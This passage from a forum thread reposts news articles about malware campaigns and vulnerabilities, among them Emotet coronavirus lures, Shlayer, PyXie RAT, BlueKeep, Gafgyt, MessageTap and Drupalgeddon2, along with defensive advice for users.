apps like these on the Google Play Store. But first, I’m going to give you my advice: You don’t need cleaner apps for your Android. Sample size of one here, but I’ve never used (or needed) a cleaner app in all the countless years I’ve used Android, and my devices have never suffered. Besides, you’re only asking for trouble if you actually think that an app with a scammy-sounding title like “Super Clean-Phone Booster,Junk Cleaner&CPU Cooler” is going to do anything helpful for your phone. If you really, really feel like your device’s performance is terrible, consider backing up your photos and videos to the cloud, factory reset your device, and set it up from scratch again. Odds are good your device will still feel slow, since newer apps and operating system updates might have more demanding requirements than when you first purchased your smartphone, but you might at least be able to clear up some system resources by mass-clearing out any background apps you forgot about. And if your phone was nearly maxed out with data, clearing up some space might make Android feel a little faster. As for Trend Micro, they have a great observation about how it’s difficult to verify an app’s legitimacy by only looking at its reviews and ratings—if you’re just focusing on numbers and stars, that is. "Verifying an app’s legitimacy is typically done by checking user-created reviews on the Play Store. However, in this particular case, the malicious app is capable of downloading payloads that can post fake reviews unbeknownst to the user. Despite the slew of positive reviews, it does leave some red flags — even though different users left positive reviews, the comments they leave contain the same, exact text: ‘Great, works fast and good.’ They also gave the app the same four-star rating." As always, stick to downloading apps from Google Play and turn off your device’s ability to install apps from unknown sources, if you’ve ever used that to sideload an app and forgot to reset it. When you’re considering installing a new app on your device, even from Google Play, ask yourself whether it’s truly necessary. Do a web search to see if more trustworthy alternatives exist from well-known app developers and brands. Read the reviews to see if they sound off. Has the app been around for years and received regular updates, or is this an app’s very first version—and, somehow, it’s racked up a ton of reviews despite only being a few days old? Unfortunately, the onus is on you to keep your device free of crappy apps. Google can help, but it can’t catch everything in advance—as we’ve seen. And make sure you’re giving your friends this advice, too; you might be smart, but your loved ones who are a bit less tech-savvy are probably going crazy with cleaner and other crapware downloads. Help them! Source
  9. New Coronavirus Strain? Nope, Just Hackers Trying to Spread Malware PhotoCredit: NurPhoto via Getty The hackers have been using files and emails that warn about a new coronavirus strain to trick users into opening them. Doing so can secretly deliver malware to the victim's machine. Received a random file about the coronavirus? It's best to avoid opening it. Hackers are starting to exploit fears around the ongoing outbreak to infect computers with malware, according to security researchers. The attacks have been occurring through files and emails that pretend to know something about the coronavirus, but have actually been designed to take over the victim's computer. On Wednesday, the hackers were spotted sending out spam emails to users in Japan, warning about a new strain of coronavirus reaching the island country, according to IBM Security. The emails, which are written in Japanese, urge the recipient to open up the attached Word document to learn more. If macros are enabled, the opened document will be able to execute a series of commands to secretly download the Emotet malware, which can steal sensitive information from your machine or deliver other dangerous payloads, such as ransomware. The email pretends to come from a disability welfare service provider: "This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it," IBM Security said in the report. "We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads. This will probably include other languages too." On Thursday, the security firm Kaspersky Lab also reported uncovering malicious files disguised as documents about a new strain of coronavirus. To deliver the payload, the hackers were using PDFs, MP4 files and Word documents. "The file names imply that they contain video instructions on how to protect yourself from the virus, updates on the threat and even virus detection procedures, which is not actually the case," Kaspersky Lab said. In reality, the discovered files contained a range of different malware threats capable of destroying, blocking modifying and copying data on the victim's machine. "So far we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow," said Kaspersky malware analyst Anton Ivanov in a statement. On Friday, the security firm updated the number of detected malicious files to 32. Source
  10. Mac users are getting bombarded by laughably unsophisticated malware For malware so trite and crude, Shlayer is surprisingly prolific. Enlarge Kaspersky Lab Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it’s the number one threat encountered by users of Kaspersky Labs’ antivirus programs for macOS. Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab’s Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific. An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.” Another banal detail about Shlayer is its previously mentioned infected method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware. Second verse, same as the first The file downloaded by the Python variant Kaspersky Lab analyzed installs adware known as Cimpli. It ostensibly offers to install applications such as Any Search, which as indicated by search results is clearly a program no one should want. Behind the scenes, it installs a malicious Safari extension and a tool that includes a self-signed TLS certificate that allows the extension to view encrypted HTTPS traffic. To work around any user suspicions, Cimpli superimposes its own windows over dialog boxes that macOS provides. The left windows in the image below are what targeted users see when Cimpli is installing the Safari extension. The window to the right is what’s covered up. By clicking on the button, the user unwittingly agrees to install the extension. The HTTPS decryption tool also superimposes a fake window over the installation confirmation box. Once installed, all user traffic is redirected to an attacker-controlled proxy server. Enlarge Kaspersky Lab Shlayer traditionally has relied on paid affiliates to seed advertising landing pages that display the fake Flash updates. Kaspersky Lab said Shlayer offers some of the highest rates. A newer ploy is the embedding of malicious links in pages on Wikipedia and YouTube. Kaspersky Lab said a single affiliate did so by registering more than 700 expired domains. It’s hard to believe that malware this artless would be among the most common threats facing Mac users. One explanation may be that Shlayer operators must bombard Mac users over and over in a brute-force fashion to compensate for extremely low success rates. A more somber, and probably less likely, possibility: the success rate is high enough that operators keep coming back for more. In either case, it’s likely that the help of affiliates contributes to Shlayer’s ranking. In any event, Shlayer’s ranking is a good reason for people to remember that Flash is an antiquated browser add-on that presents more risk than benefit for the vast majority of the world. For those who must use it, they should download updates solely from https://get.adobe.com/flashplayer/. People should never receive updates from windows that are displayed when trying to view videos or install software. The distinction can be hard for less experienced users, because Flash itself presents—or at least used to present—notifications when updates were available. People also would do well to steer clear of sites offering pirated material. Source: Mac users are getting bombarded by laughably unsophisticated malware (Ars Technica)
  11. Now 29-year-old faces years in the clink after long battle to bring him to justice A 29-year-old Russian scumbag has admitted masterminding the Cardplanet underworld marketplace as well as a second forum for elite fraudsters. Aleksei Burkov appeared in a US federal district court in Virginia this week to plead guilty [PDF] to access device fraud, and conspiracy to commit computer intrusion, identity theft, wire and access device fraud, and money laundering. Cardplanet was an internet souk in which crooks bought and sold stolen bank card details. When he was cuffed and charged last November, prosecutors estimated the website accounted for roughly $20m in fraud. Burkov also ran, we're told, an exclusive invite-only cybercrime den in which malware, money laundering, and hacking-for-hire were touted by top-tier miscreants as well as credit cards. "To obtain membership in Burkov’s cybercrime forum, prospective members needed three existing members to 'vouch' for their good reputation among cybercriminals and to provide a sum of money, normally $5,000, as insurance," Uncle Sam's legal eagles said of the secret den on Thursday. "These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum." For the Feds, this has been a long time coming. US authorities sought Burkov's extradition back in 2017 after he was collared in Israel in 2015. After exhausting his opportunities to appeal the extradition in the Israeli legal system, Burkov was sent to the US to face trial in November of last year, and has now finally coughed to his crimes. Burkov faces a maximum of 15 years behind bars when he is sentenced on May 8, though courts typically hand down much lighter sentences when perps skip lengthy trials and go straight to pleading guilty. Source
  12. PyXie RAT capabilities include keylogging, stealing login credentials and recording videos, warn researchers at BlackBerry Cylance - who also say the trojan can be used to distribute other attacks, including ransomware. A newly discovered hacking campaign by a 'sophisticated cyber criminal operation' is targeting healthcare and education organisations with custom-built, Python-based trojan malware which gives attackers almost control of Windows systems with the ability to monitor actions and steal sensitive data. Malicious functions of the remote access trojan , dubbed PyXie RAT, include keylogging, credential harvesting, recording video, cookie theft, the ability to perform man-in-the-middle attacks and the capability to deploy other forms of malware onto infected systems. All of this is achieved while clearing evidence of suspicious activity in an effort to ensure the malware isn't discovered. However, traces of the attacks have been found and detailed by cyber security researchers at Blackberry Cylance, who named the malware PyXie because of the way its compiled code uses a '.pyx' file extension instead of the '.pyc' typically associated with Python. PyXie RAT has been active since at least 2018 and is highly customised, indicating that a lot of time and resources have gone into building it. "The custom tooling and the fact it has remained under the radar this long definitely shows a level of obfuscation and stealth in line with a sophisticated cyber criminal operation," Josh Lemos, VP of research and intelligence at Blackberry Cylance told ZDNet. The malware is typically delivered to victims by a sideloading technique which leverages legitimate applications to help compromise victims. One of these applications uncovered by researchers was a trojanized version of an open source game, which if downloaded, will go about secretly installing the malicious payload, using PowerShell to escalate privileges and gain persistence on the machine. A third stage of the multi-level download sees PyXie RAT leverage something known in the code as 'Cobalt Mode' which connects to a command and control server as well as downloading the final payload. This stage of the download takes advantage of Cobalt Strike – a legitimate penetration testing tool – to help install the malware. It's a tactic which is often deployed by cyber criminal gangs and something which aids in making attacks more difficult to attribute. This particular downloader also has similarities with another used to download the Shifu banking trojan, however, it could simply be a case of criminals taking open source – or stolen – code and re-purposing it for their own ends. "An advantage of utilizing a widely used tool such as Cobalt Strike is it makes attribution difficult since it is used by many different threat actors as well as legitimate pentesters. With the Shifu banking trojan similarities, it is unclear if it is the same actors or if someone else reused some of its code," said Lemos. Once successfully installed on the target system, the attackers can can move around the system and implement commands as they please. In addition to being used to steal usernames, passwords and any other information enter the system, researchers note that there are cases of PyXie being used to deliver ransomware to compromised networks. "This is a full-featured RAT that can be leveraged for a wide range of goals and the actors will have different motives depending on the target environment. The fact it has been used in conjunction with ransomware in a few environments indicates that the actors may be financially motivated, at least in those instances," said Lemos. The full extent of the PyXie RAT campaign still isn't certain, but researchers have identified attacks against over 30 organisations, predominately in the healthcare and education industries, with hundreds of machines believed to have been infected. Aside from likely being a well-resourced cyber criminal group, it's currently unknown who exactly is behind PyXie RAT, but the campaign is still thought to be active. However, despite the sophisticated nature of the malware, researchers state that it can be protected against by standard cyber hygiene and enterprise security best practices including operating system and application patching, endpoint protection technology, auditing, logging and monitoring of endpoint and network activity and auditing of credential use. Source
  13. After months of warnings, the first successful attack using Microsoft's BlueKeep vulnerability has arrived—but isn't nearly as bad as it could have been. Microsoft first announced the BlueKeep vulnerability in May; now, hackers have finally caught up with it. When Microsoft revealed last May that millions of Windows devices had a serious hackable flaw known as BlueKeep—one that could enable an automated worm to spread malware from computer to computer—it seemed only a matter of time before someone unleashed a global attack. As predicted, a BlueKeep campaign has finally struck. But so far it's fallen short of the worst case scenario. Security researchers have spotted evidence that their so-called honeypots—bait machines designed to help detect and analyze malware outbreaks—are being compromised en masse using the BlueKeep vulnerability. The bug in Microsoft's Remote Desktop Protocol allows a hacker to gain full remote code execution on unpatched machines; while it had previously only been exploited in proofs of concept, it has potentially devastating consequences. Another worm that targeted Windows machines in 2017, the NotPetya ransomware attack, caused more than 10 billion dollars in damage worldwide. But so far, the widespread BlueKeep hacking merely installs a cryptocurrency miner, leeching a victim's processing power to generate cryptocurrency. And rather than a worm that jumps unassisted from one computer to the next, these attackers appear to have scanned the internet for vulnerable machines to exploit. That makes this current wave unlikely to result in an epidemic. "BlueKeep has been out there for a while now. But this is the first instance where I’ve seen it being used on a mass scale," says Marcus Hutchins, a malware researcher for security firm Kryptos Logic who was one of the first to build a working proof-of-concept for the BlueKeep vulnerability. "They’re not seeking targets. They’re scanning the internet and spraying exploits." Hutchins says that he first learned of the BlueKeep hacking outbreak from fellow security researcher Kevin Beaumont, who observed his honeypot machines crashing over the last few days. Since those devices exposed only port 3389 to the internet—the port used by RDP—he quickly suspected BlueKeep. Beaumont then shared a "crashdump," forensic data from those crashed machines, with Hutchins, who confirmed that BlueKeep was the cause, and that the hackers had intended to install a cryptocurrency miner on the victim machines. Hutchins says he hasn’t yet determined which coin they’re trying to mine, and notes that the fact the target machines crash indicate that the exploit may be unreliable. The malware's authors appear to be using a version of the BlueKeep hacking technique included in the open-source hacking and penetration testing framework Metasploit, Hutchins says, which was made public in September. It's unclear also how many devices have been impacted, although the current BlueKeep outbreak appears to be far from the RDP pandemic that many feared. "I've seen a spike, but not the level I'd expect from a worm," says Jake Williams, a founder of the security firm Rendition Infosec, who has been monitoring his clients' networks for signs of exploitation. "It hasn’t hit critical mass yet." In fact, Williams argues, the absence of a more severe wave of BlueKeep hacking so far may actually indicate a success story for Microsoft's response to its BlueKeep bug—an unexpected happy ending. "Every month that passes by without a worm happening, more people patch and the vulnerable population goes down," Williams says. "Since the Metasploit module has been out for a couple of months now, the fact that no one has wormed this yet seems to indicate there’s been a cost-benefit analysis and there’s not a huge benefit to weaponizing it." But the threat BlueKeep poses to hundreds of thousands of Windows machines hasn't passed just yet. About 735,000 Windows computers remained vulnerable to BlueKeep according to one internet-wide scan by Rob Graham, a security researcher and founder of Errata Security, who shared those numbers with WIRED in August. And those machines could still be hit with a more serious—and more virulent—specimen of malware that exploits Microsoft's lingering RDP vulnerability. That could take the form of a ransomware worm in the model of NotPetya or also WannaCry, which infected almost a quarter million computers when it spread in May of 2017, causing somewhere between $4 and $8 billion damage. In the meantime, the current spate of BlueKeep cryptocurrency mining will represent an annoyance for those unlucky enough to have their computers crashed or hijacked by its cryptocurrency mining—and at most a vague harbinger of a more severe attack on the horizon. "A BlueKeep exploit is perfect for getting more systems to mine from," says Hutchins. "It’s not necessarily going to affect whether someone still makes a ransomware worm at some point." If helping hackers mine a few cryptocoins is the worst that BlueKeep ultimately inflicts, in other words, the internet will have dodged a bullet. Source
  14. All Android 8 (Oreo) or later devices are impacted. Google released a patch last month, in October 2019. Google patched last month an Android bug that can let hackers spread malware to a nearby phone via a little-known Android OS feature called NFC beaming. NFC beaming works via an internal Android OS service known as Android Beam. This service allows an Android device to send data such as images, files, videos, or even apps, to another nearby device using NFC (Near-Field Communication) radio waves, as an alternative to WiFi or Bluetooth. Typically, apps (APK files) sent via NFC beaming are stored on disk and a notification is shown on screen. The notification asks the device owner if he wants to allow the NFC service to install an app from an unknown source. But, in January this year, a security researcher named Y. Shafranovich discovered that apps sent via NFC beaming on Android 8 (Oreo) or later versions would not show this prompt. Instead, the notification would allow the user to install the app with one tap, without any security warning. While the lack of one prompt sounds unimportant, this is a major issue in Android's security model. Android devices aren't allowed to install apps from "unknown sources" -- as anything installed from outside the official Play Store is considered untrusted and unverified. If users want to install an app from outside the Play Store, they have to visit the "Install apps from unknown sources" section of their Android OS and enable the feature. Until Android 8, this "Install from unknown sources" option was a system-wide setting, the same for all apps. But, starting with Android 8, Google redesigned this mechanism into an app-based setting. In modern Android versions, users can visit the "Install unknown apps" section in Android's security settings, and allow specific apps to install other apps. For example, in the image below, the Chrome and Dropbox Android apps are allowed to install apps, similar to the Play Store app, without being blocked. The CVE-2019-2114 bug resided in the fact that the Android Beam app was also whitelisted, receiving the same level of trust as the official Play Store app. Google said this wasn't meant to happen, as the Android Beam service was never meant as a way to install applications, but merely as a way to transfer data from device to device. The October 2019 Android patches removed the Android Beam service from the OS whitelist of trusted sources. However, many millions of users remain at risk. If users have the NFC service and the Android Beam service enabled, a nearby attacker could plant malware (malicious apps) on their phones. Since there's no prompt for an install from an unknown source, tapping the notification starts the malicious app's installation. There's a danger that many users might misinterpret the message as coming from the Play Store, and install the app, thinking it's an update. HOW TO PROTECT YOURSELF There are good news and bad news. The bad news is that the NFC feature is enabled by default on mostly all newly-sold devices. Many Android smartphone owners may not even be aware that NFC is enabled even right now. The good news is that NFC connections are initiated only when two devices are put near each other at a distance of 4 cm (1.5 inches) or smaller. This means an attacker needs to get his phone really close to a victim's, something that may not always be possible. To stay safe, any user can disable both the NFC feature and the Android Beam service. If they use their Android phones as access cards, or as a contactless payment solutions, they can leave NFC enabled, but disable the Android Beam service -- see image below. This blocks NFC file beaming, but still allows other NFC operations. So, there's no need to panic. Just disable Android Beam and NFC if you don't need them, or update your phone to receive the October 2019 security updates and continue using both NFC and Beam as usual. A technical report on CVE-2019-2114 is available here. Source: Android bug lets hackers plant malware via NFC beaming (via ZDNet)
  15. Jack Wallen offers up his best advice for avoiding malware on Android. We're back to the topic that bears repeating every month or so: Android and malware. They seem to be like chocolate and peanut butter these days. But why? Is it the developer's fault? Is the onus on Google? I'm going to open a rather messy can of worms and say the blame could easily fall on the shoulders of everyone involved--including the user. But in the end, no matter how secure a platform Google released, if Android is used poorly, bad things will happen. The same holds true for Windows, macOS, and (gasp) even Linux. That's right. I could deploy a Linux desktop to someone and if they misuse the platform, similar bad things could happen. So what's a user to do? Nothing different than I've said before. In fact, I laid out a simple plan for users in 4 ways to avoid malware on Android. But as many an admin knows, the simpler the advice is for end users, the more likely the advice will stick. My advice? Only install applications you have to have. How users use devices I know, it's not really that easy. Why? Because users don't have the control necessary to limit themselves to only installing required applications. According to this article from sister site ZDNet, social media takes up the bulk of smartphone usage, with Americans spending an average of just over an hour a day on Facebook and 48 minutes on Instagram. Millennials spend roughly 48 minutes per day texting, versus 30 minutes for baby boomers. Boomers, on the other hand, spend 43 minutes per day on email, whereas millennials spend less than 10 minutes per day within an email app. Outside of that, the majority of time spent on smartphones is divided between the following apps/services: Internet Podcasts Snapchat Music Twitter Youtube News apps Messenger Phone So our full list of most-used apps and services looks like: Facebook Instagram Texting Phone Internet Podcasts Snapchat Music Twitter Youtube Messenger News apps Email Of those apps/services, Android has the following built into its ecosystem: Texting - Messages Phone - Phone app Internet - Chrome Podcasts - Play Music Music - Play Music Youtube - Youtube app Messenger - Messenger app News Apps - Google News Email - Gmail app What's left over? Instagram Snapchat Twitter By installing only three apps, the majority of millennials and boomers can satisfy all of their mobile needs. Three simple apps, each of which are found in the Google Play Store and have been thoroughly vetted by both the companies that created them and Google itself. Or have they? Back in 2014, more than four million Snapchat users' data was released by hackers reacting to Snapchat's claim it had no knowledge of vulnerabilities. This wasn't an issue with the Snapchat app, but the Snapchat service. And it wasn't malware. Installing the Snapchat app on an Android device wasn't accompanied by malicious code. The app itself was safe. As are all of the apps on the list above. At least they are as safe as any piece of software can be. Which is to say, not 100%. But that's the risk we all take for living an always-connected life. As the saying goes, any computer connected to the internet is vulnerable. What's the solution? This is where it gets simple. If you want to avoid malware on Android, you install only the apps you must have to do your work. Outside of that, you install Instagram, Snapchat, and Twitter and use the built-in apps to round out your experience. I know what you're asking. What about games? Funny thing, games. The majority of responses to the original ZDNet screen time poll never mentioned games. Of course we all know that the mobile gaming industry is massive, so people are--without a doubt--playing games on their devices. For those that do, I would suggest one of two things: Have a separate device for games. Only install games from official companies or reputable developers. In the end, the solution is to limit the apps you install on your device and to only install those apps from the Google Play Store. Do that and the chances of your device getting infected with malware is drastically reduced. Just remember, nothing is guaranteed in this digital age. Be safe. Source: How to avoid malware on Android in one easy step (via Tech Republic)
  16. MessageTap malware is meant to be installed on Short Message Service Center (SMSC) servers, on a telco's network. One of China's state-sponsored hacking groups has developed a custom piece of Linux malware that can steal SMS messages from a mobile operator's network. The malware is meant to be installed on Short Message Service Center (SMSC) servers -- the servers inside a mobile operator's network that handle SMS communications. US cyber-security firm FireEye said it spotted this malware on the network of a mobile operator earlier this year. HOW MESSAGETAP WORKED FireEye analysts said hackers breached a yet-to-be-named telco and planted the malware -- named MessageTap -- on the company's SMSC servers, where it would sniff incoming SMS messages, and apply a set of filters. First, MessageTap would set SMS messages aside to be stolen at a later point if the SMS message's body contained special keywords. "The keyword list contained items of geopolitical interest for Chinese intelligence collection," FireEye said. "Sanitized examples include the names of political leaders, military and intelligence organizations and political movements at odds with the Chinese government." Second, MessageTap would also set SMS messages aside if they were sent from or to particular phone numbers, or from or to a device with a particular IMSI unique identifier. FireEye said the malware tracked thousands of device phone numbers and IMSI codes at a time. PART OF APT41'S ARSENAL The company's analysts linked the malware to a relatively new Chinese hacker group it calls APT41 [PDF report]. In a previous report, FireEye said that APT41 stood apart from other Chinese groups because besides performing politically-motivated cyber-espionage, the group's members also carried out financially-motivated hacks, most likely for their private benefits. Furthermore, FireEye also found evidence on the hacked telco's network that APT41 interacted with the mobile operator's call detail record (CDR) database -- a database that stores metadata on past phone calls. FireEye said APT41 queried for the "CDR records [that] corresponded to foreign high-ranking individuals of interest to the Chinese intelligence services." While FireEye didn't name the hacked telco or the spied on targets, Reuters journalists said that MessageTap was related to China's efforts to track its Uyghur minority, with some of these efforts involving hacking telcos to track Uyghur travelers' movements. CHINESE HACKING OPERATIONS ARE CHANGING The discovery of this campaign is significant, in the grand scheme of things of Chinese cyber-espionage operations, as a whole. For the past years, Chinese hacking groups have been known for their smash-and-grab approach, where they hacked a target and stole as much data as they could, to analyze it at later points. APT41's modus operandi shows a carefully planned and very targeted surveillance operation aimed at a very small group of targets. That's different from what Chinese hacking groups have done in the past, but it appears to have become the norm these days -- if we take into account the CCleaner and ASUS Live Update hacks, where Chinese hackers also breached a company just to go after a small subset of its customers. The overall arch is that Chinese hacker groups are now getting very good at targeted operations, on par with what we've usually seen from US or Russian operations. On a side note, FireEye's report today also confirms a general trend of Chinese hackers going after telecom opertions, first detailed in a June 2019 Cybereason report which found that Chinese government hackers had breached the networks of at least ten foreign mobile operators. Source: Chinese hackers developed malware to steal SMS messages from telco's network (via ZDNet)
  17. Gafgyt has been updated with new capabilities, and it spreads by killing rival malware. Tens of thousands of Wi-Fi routers are potentially vulnerable to an updated form of malware which takes advantage of known vulnerabilities to rope these devices into a botnet for the purposes of selling distributed denial of service (DDoS) attack capabilities to cyber criminals. A new variant of Gafgyt malware – which first emerged in 2014 – targets small office and home routers from well known brands, gaining access to the devices via known vulnerabilities. Now the authors of Gafgyt – also known as Bashlite – have updated the malware and are directing it at vulnerabilities in three wireless router models. The Huawei HG532 and Realtek RTL81XX were targeted by previous versions of Gafgyt, but now it's also targeting the Zyxel P660HN-T1A. In all cases, the malware is using a scanner function to find units facing the open internet before taking advantage of vulnerabilities to compromise them. The new attacks have been detailed by cybersecurity researchers at Palo Alto Networks. The Gafgyt botnet appears to be directly competing with another botnet – JenX – which also targets the Huawei and Realtek routers, but not Zyxel units. Ultimately, the attackers behind Gafgyt want to kill off their competition by replacing JenX with their own malware. "The authors of this malware want to make sure their strain is the only one controlling a compromised device and maximizing the device's resources when launching attacks," Asher Davila, security researcher at the Palo Alto Networks Unit 42 research division told ZDNet. "As a result, it is programmed to kill other botnet malware it finds, like JenX, on a given device so that it has the device's full resources dedicated to its attack". Control of the botnet allows its gang to launch DDoS attacks against targets in order to cause disruption and outages. While the malware could be used to launch denial of service campaigns against any online service, the current incarnation of Gafgyt appears to focus on game servers, particularly those running Valve Source Engine games, including popular titles Counter-Strike and Team Fortress 2. Often the targeted servers aren't hosted by Valve, but rather are private servers hosted by players. The most common reason for attacks is plain sabotage of other users: some young game players want to take revenge against opponents or rivals. Those interested in these malicious services don't even need to visit underground forums to find them – Unit 42 researchers note that botnet-for-hire services have been advertised using fake profiles on Instagram and can cost as little as $8 to hire. Researchers have alerted Instagram to the accounts advertising malicious botnet services. "There's clearly a younger demographic that they can reach through that platform, which can launch these attacks with little to no skill. It is available to everyone and is easier to access than underground sites," said Davila. As more IoT products become connected to the internet, it's going to become easier for attacker to rope devices into botnets and other malicious activity if devices aren't kept up to date. The routers being targeted by the new version of Gafgyt are all old – some have been on the market for more than five years – researchers recommend upgrading your router to a newer model and that you should regularly apply software updates to ensure the device is as protected as possible against attacks. "In general, users can stay safe against botnets by getting in the habit of updating their routers, installing the latest patches and implementing strong, unguessable passwords," Davila explained. The more frequent the better, but perhaps for simplicity, considering timing router updates around daylight savings so at least you're updating twice a year," he added. Source: This aggressive IoT malware is forcing Wi-Fi routers to join its botnet army (via ZDNet)
  18. Apple has confirmed that 17 malware iPhone apps were removed from the App Store after successfully hiding from the company’s app review process. The apps were all from a single developer but covered a wide range of areas, including a restaurant finder, internet radio, BMI calculator, video compressor, and GPS speedometer … The apps were discovered by mobile security company Wandera, which said that the apps did what they claimed while secretly committing fraud in the background. Although no direct harm was done to app users, the activity would be using up mobile data, as well as potentially slowing the phone and accelerating battery drain. Wandera said the malware iPhone apps evaded Apple’s review process because the malicious code was not found within the app itself, but the apps were instead getting instructions on what to do from a remote server. Apple says it is improving its app review process to detect this approach. The same server was also controlling Android apps. In at least one of those cases, weaker security in Android meant that the app was able to do more direct harm. The apps were all from AppAspect Technologies. iOS aims to guard against this by sandboxing. Each app gets its own private environment, so cannot access system data or data from other apps unless using processes specifically permitted and monitored by iOS. However, Wandera cautions that there have been examples of the sandbox failing, giving three examples of this. Wandera is the same company that warned how a Siri feature could be used for phishing non-technically knowledgeable iPhone users. Apple confirmed the removal of the 17 apps to ZDNet. Source: 1. 17 malware iPhone apps removed from App Store after evading Apple’s review (via 9to5Mac) - Main article 2. Trojan malware infecting 17 apps on the App Store (via Wandera) - Main reference to the article p/s: The list of 17 apps that are mentioned on the article are as follows:
  19. A new report -- Webroot Threat Report: Mid-Year Update -- has found that one in 50 URLs are malicious, nearly one-third of phishing sites use HTTPS and Windows 7 and exploits have grown 75 percent since January 2019. According to the report, Hackers are using trusted domains and HTTPS to trick victims. Nearly a quarter (24 percent) of malicious URLs were found to be hosted on trusted domains, as hackers know trusted domain URLs raise less suspicion among users and are more difficult for security measures to block. 1 in 50 URLs (1.9 percent) were found to be malicious, which is high, the report says, given that nearly a third (33 percent) of office workers click more than 25 work-related links per day. Nearly a third (29 percent) of detected phishing web pages use HTTPS as a method to trick users into believing they're on a trusted site via the padlock symbol. Phishing continued rapid growth into 2019, and criminals are expanding their phishing targets. Phishing grew rapidly, with a 400-percent increase in URLs discovered from January to July 2019. The top industries impersonated by phishing include: 25 percent are SaaS/Webmail providers 19 percent are financial institutions 16 percent are social media 14 percent are retail 11 percent are file hosting Eight percent are payment services companies Phishing lures are becoming increasingly personalized as more PII is collected from breaches. Phished passwords are used for more than account takeover. Specifically: extortion emails are being used, claiming the user has been caught doing something embarrassing or damaging that will be shared with colleagues, friends and family unless a ransom is paid, says the results. Phishing doesn't always target usernames and passwords. The attacks also go after secret questions and their answers, says the report. Windows 7 is becoming even riskier, with infections increasing by 71 percent. Between January and June, the number of IPs that host Windows exploits grew 75 percent Malware samples seen on only one PC are at 95.2 percent, up from 91.9 percent in 2018 Out of all infected PCs, 64 percent were home user machines, and 36 percent were business devices. More at: (Webroot) Source
  20. Hackers continue to target the Drupal vulnerability named Drupalgeddon2 to install malware onto unpatched systems, Akamai’s security researchers have discovered. Tracked as CVE-2018-7600, the security flaw impacts Drupal versions 6, 7 and 8. The bug was addressed in March 2018, with the first attacks targeting it spotted only several weeks later, attempting to deploy malicious programs such as crypto-miners and backdoors. Now, Akamai security researcher Larry W. Cashdollar reveals that the vulnerability continues to be targeted in a recently observed malicious campaign where attackers attempt to run code embedded in a .gif file. Although not widespread, the campaign appears to be targeting a broad range of high profile websites, without a focus on a specific industry. One of the analyzed .gif files was hosted on a compromised bodysurfing website located in Brazil. The file contains obfuscated PHP code designed to decode base64-encoded malware stored in a variable. The researcher discovered that the malware could scan for credentials stored in local files, send email with the discovered credentials, replace the local .htaccess file, display MySQL my.cnf configuration files, execute a remote file, show system information, rename files, upload files, and launch a web shell. In addition to the .gif, the attack drops a piece of malware stored in a .txt in the form of a Perl script. This malicious program uses Internet Relay Chat (IRC) for command and control (C&C) communication. The threat can launch distributed denial-of-service (DDoS) attacks, but also functions as a remote access Trojan (RAT). It can connect to a now defunct IRC server and join a specific channel to receive commands. Functionality included in the malware allows it to gather information from the local system and provide attackers with control over it. It also supports a SQL flood command, which allows the malware operators to send generic HTTP GET requests to MySQL’s default port, 3306, on the specified target. “This piece of code has been widely shared and modified by the criminal Internet underground,” Cashdollar says. The new campaign underlines once again the importance of maintaining a good security hygiene, which also involves patching in a timely manner. The targeted Drupalgeddon2 vulnerability is a year and a half old and can be easily exploited, which creates great risks for enterprise environments with unpatched systems, as scanning and infection attacks can be automated. “Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take,” the researcher concludes. Source
  21. Brian12

    Malware Removal Guide

    "This guide will help you remove malicious software from your computer. If you think your computer might be infected with a virus or trojan, you may want to use this guide. It provides step-by-step instructions on how to remove malware from Windows operating system. It highlights free malware removal tools and resources that are necessary to clean your computer. You will quickly learn how to remove a virus, a rootkit, spyware, and other malware." Guide: http://www.selectrealsecurity.com/malware-removal-guide I'll be posting updates. :)
  22. Security researchers discovered a new form of malware that specifically targeted users of a French telecom giant. One of the more disturbing features of this malware is its capability to identify when someone was likely viewing porn and record their screen. Researchers at IT security company ESET spotted the malware, which they coined Varenyky, in May of this year, and in July, operators of the malware launched their first sextortion scam. The malware targets customers of Orange S.A., a French internet service provider, and filters out non-French users based on the location of someone’s computer. According to the researchers, the malware is sent in the form of an email with a fake Microsoft Word attachment under the guise of a €491.27 bill. The document is actually malware, and opening it infects the user’s computer. The researchers pointed out that the hackers routinely tweaked and added commands to the malware, and that a recent version deployed a hidden desktop on someone’s computer that was able to navigate menus, read text, take screenshots, click on the screen, adjust windows, and even record the screen’s activity. One feature the researchers spotted in one version of the malware was that it would search for porn-related words in French in a user’s window and subsequently record the screen and upload it the command and control server, which is a computer that can send instructions to a device infected with malware. The researchers noted, though, that while the malware is capable of recording someone’s screen while they watch porn, they didn’t find any evidence indicating that the hackers exploited these recordings beyond collecting them. That being said, in July, the hackers did deploy a sextortion scam—in which someone was blackmailed through sexual material. The sextortion scam is also sent in the form of an email and informs the recipient that a virus-infected their computer when they were watching porn, and that the hackers have gained access to their computer. The scammer also claims that they have a video of both the porn the victim was watching as well as a recording from their webcam of “you having… fun.” The scammer says that if they don’t pay them €750 in bitcoin within 72 hours, they’ll send the video to family, coworkers, and post it on social media. “This offer is non-negotiable, do not waste my time and yours, think about the consequences of your actions,” it states in the 